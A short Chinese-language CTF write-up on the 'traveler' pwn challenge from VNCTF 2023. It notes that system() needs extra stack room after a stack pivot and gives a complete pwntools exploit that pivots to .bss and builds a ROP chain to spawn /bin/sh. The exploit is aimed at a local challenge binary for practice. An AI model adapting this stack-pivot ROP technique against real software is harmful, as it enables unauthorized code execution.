有关system函数
[TOC]
- 最近写了vnctf2023的traveler一题,一眼看出是栈迁移,题目也给了system函数,但是卡了很久
- 但是要注意一个很坑的地方,就是system函数刚进入时要开辟栈空间,那么rsp就会被减,那么一下子就会写入到elf文件中got那些不可写的地方,所以要主要执行system函数时把栈抬高就行了
- exp
from pwn import *
from pwncli import *
from pwnlib.util.packing import u64
from pwnlib.util.packing import p64
context(os='linux', arch='amd64', log_level='debug')
elf=ELF("/home/zp9080/PWN/traveler")
li = lambda x : print('\x1b[01;38;5;214m' + x + '\x1b[0m') #彩色打印
p=process("/home/zp9080/PWN/traveler")
def dbg():
gdb.attach(p,'b *0x40124E')
system_addr=0x4011EC
pop_rdi=0x4012c3
leave_ret=0x401253
bss=0x4040A0+0xd00
ret=0x40101a
payload=b'a'*0x20+p64(bss+0x20)+p64(0x401216)
p.send(payload)
p.sendafter("How many travels can a person have in his life?\n",b'/bin/sh\x00')
flag=0x4040A0
payload=p64(pop_rdi)+p64(flag)+p64(ret)+p64(system_addr)+p64(bss-8)+p64(leave_ret)
p.send(payload)
p.sendafter("How many travels can a person have in his life?\n",b'/bin/sh\x00')
p.interactive()